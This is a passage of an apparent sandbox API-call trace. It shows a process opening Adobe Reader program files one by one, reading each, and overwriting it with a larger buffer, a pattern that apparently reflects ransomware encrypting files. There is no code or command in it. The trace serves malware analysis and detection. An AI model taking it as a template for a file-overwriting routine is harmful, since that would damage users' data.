dwFlags=0x0, lpWideCharStr="QuickTime.RUM", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.RUM", lpUsedDefaultChar=0x0) returned 13 [0084.384] ReadFile (in: hFile=0x1ec, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x311f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0084.413] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0084.414] WriteFile (in: hFile=0x1ec, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x311f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0084.414] CloseHandle (hObject=0x1ec) returned 1 [0084.414] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\QuickTime.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_sky\\quicktime.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0084.415] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0084.415] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xa00 [0084.416] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0084.416] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.416] ReleaseMutex (hMutex=0x168) returned 1 [0084.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.SKY", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0084.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.SKY", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.SKY", lpUsedDefaultChar=0x0) returned 13 [0084.416] ReadFile (in: hFile=0x1ec, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x311f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0084.428] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0084.429] WriteFile (in: hFile=0x1ec, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x311f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0084.429] CloseHandle (hObject=0x1ec) returned 1 [0084.429] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\QuickTime.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_tur\\quicktime.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0084.430] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0084.430] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xa00 [0084.430] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0084.430] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.430] ReleaseMutex (hMutex=0x168) returned 1 [0084.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.TUR", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0084.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.TUR", cchWideChar=13, lpMultiByteStr=0x1f733cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.TUR", lpUsedDefaultChar=0x0) returned 13 [0084.431] ReadFile (in: hFile=0x1ec, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x311f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0084.444] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0084.444] WriteFile (in: hFile=0x1ec, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x311f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0084.445] CloseHandle (hObject=0x1ec) returned 1 [0084.445] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\PPKLite.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\ppklite.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0084.446] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0084.446] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x73f263 [0084.446] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0084.446] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.446] ReleaseMutex (hMutex=0x168) returned 1 [0084.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLite.api", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0084.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLite.api", cchWideChar=11, lpMultiByteStr=0x1f7358c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLite.api", lpUsedDefaultChar=0x0) returned 11 [0084.447] ReadFile (in: hFile=0x1ec, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0084.455] ReadFile (in: hFile=0x1ec, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0084.480] ReadFile (in: hFile=0x1ec, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x311f278*=0x2000, lpOverlapped=0x0) returned 1 [0084.488] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x73d263 [0084.488] ReadFile (in: hFile=0x1ec, lpBuffer=0x2694e18, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2694e18*, lpNumberOfBytesRead=0x311f278*=0x2000, lpOverlapped=0x0) returned 1 [0084.503] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x73d263 [0084.504] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ea7eb8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea7eb8*, lpNumberOfBytesWritten=0x311f28c*=0x2588, lpOverlapped=0x0) returned 1 [0084.504] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0084.505] WriteFile (in: hFile=0x1ec, lpBuffer=0x2906cd8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2906cd8*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0084.506] WriteFile (in: hFile=0x1ec, lpBuffer=0x2906cd8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2906cd8*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0084.506] WriteFile (in: hFile=0x1ec, lpBuffer=0x2906cd8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2906cd8*, lpNumberOfBytesWritten=0x311f28c*=0x2000, lpOverlapped=0x0) returned 1 [0084.507] CloseHandle (hObject=0x1ec) returned 1 [0084.507] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\weblink.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\weblink.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0084.508] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0084.508] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x4ac63 [0084.508] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0084.509] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.509] ReleaseMutex (hMutex=0x168) returned 1 [0084.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="weblink.api", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0084.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="weblink.api", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="weblink.api", lpUsedDefaultChar=0x0) returned 11 [0084.509] ReadFile (in: hFile=0x1ec, lpBuffer=0x25a4048, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0085.079] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x49c63 [0085.080] ReadFile (in: hFile=0x1ec, lpBuffer=0x25ad0a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25ad0a8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.087] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x49c63 [0085.088] WriteFile (in: hFile=0x1ec, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.089] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0085.089] WriteFile (in: hFile=0x1ec, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0085.089] CloseHandle (hObject=0x1ec) returned 1 [0085.089] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\tesselate.x3d" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\tesselate.x3d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0085.090] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0085.090] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x5798 [0085.090] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0085.091] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.091] ReleaseMutex (hMutex=0x168) returned 1 [0085.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tesselate.x3d", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0085.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tesselate.x3d", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tesselate.x3d", lpUsedDefaultChar=0x0) returned 13 [0085.091] ReadFile (in: hFile=0x1ec, lpBuffer=0x25ad0a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25ad0a8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.102] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x4798 [0085.103] ReadFile (in: hFile=0x1ec, lpBuffer=0x25ad0a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25ad0a8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.113] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x4798 [0085.113] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.114] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0085.114] WriteFile (in: hFile=0x1ec, lpBuffer=0x25ad0a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad0a8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.114] CloseHandle (hObject=0x1ec) returned 1 [0085.114] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\bl.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\bl.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0085.115] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0085.115] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x53 [0085.115] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0085.115] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.115] ReleaseMutex (hMutex=0x168) returned 1 [0085.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bl.gif", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0085.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bl.gif", cchWideChar=6, lpMultiByteStr=0x1f7aa8c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bl.gif", lpUsedDefaultChar=0x0) returned 6 [0085.116] ReadFile (in: hFile=0x1ec, lpBuffer=0x1f9f708, nNumberOfBytesToRead=0x53, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9f708*, lpNumberOfBytesRead=0x311f2bc*=0x53, lpOverlapped=0x0) returned 1 [0085.117] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0085.117] WriteFile (in: hFile=0x1ec, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5db, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x311f2d0*=0x5db, lpOverlapped=0x0) returned 1 [0085.117] CloseHandle (hObject=0x1ec) returned 1 [0085.117] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\forms_distributed.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\forms_distributed.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0085.118] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0085.118] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x265 [0085.118] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0085.118] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.118] ReleaseMutex (hMutex=0x168) returned 1 [0085.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="forms_distributed.gif", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0085.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="forms_distributed.gif", cchWideChar=21, lpMultiByteStr=0x1f88ba4, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="forms_distributed.gif", lpUsedDefaultChar=0x0) returned 21 [0085.118] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ea5ea8, nNumberOfBytesToRead=0x265, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea5ea8*, lpNumberOfBytesRead=0x311f2bc*=0x265, lpOverlapped=0x0) returned 1 [0085.123] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0085.123] WriteFile (in: hFile=0x1ec, lpBuffer=0x288ae08*, nNumberOfBytesToWrite=0x7ed, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288ae08*, lpNumberOfBytesWritten=0x311f2d0*=0x7ed, lpOverlapped=0x0) returned 1 [0085.124] CloseHandle (hObject=0x1ec) returned 1 [0085.124] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\reviewers.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\reviewers.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0085.124] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0085.125] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x5ac [0085.125] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0085.125] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.125] ReleaseMutex (hMutex=0x168) returned 1 [0085.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reviewers.gif", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0085.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reviewers.gif", cchWideChar=13, lpMultiByteStr=0x1f7358c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reviewers.gif", lpUsedDefaultChar=0x0) returned 13 [0085.125] ReadFile (in: hFile=0x1ec, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x5ac, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x311f2bc*=0x5ac, lpOverlapped=0x0) returned 1 [0085.134] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0085.134] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e948a8*, nNumberOfBytesToWrite=0xb34, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e948a8*, lpNumberOfBytesWritten=0x311f2d0*=0xb34, lpOverlapped=0x0) returned 1 [0085.135] CloseHandle (hObject=0x1ec) returned 1 [0085.135] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\rss.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\rss.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0085.143] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0085.143] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xde [0085.143] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0085.143] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.144] ReleaseMutex (hMutex=0x168) returned 1 [0085.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rss.gif", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0085.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rss.gif", cchWideChar=7, lpMultiByteStr=0x1f7aa8c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rss.gif", lpUsedDefaultChar=0x0) returned 7 [0085.144] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ee60e8, nNumberOfBytesToRead=0xde, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee60e8*, 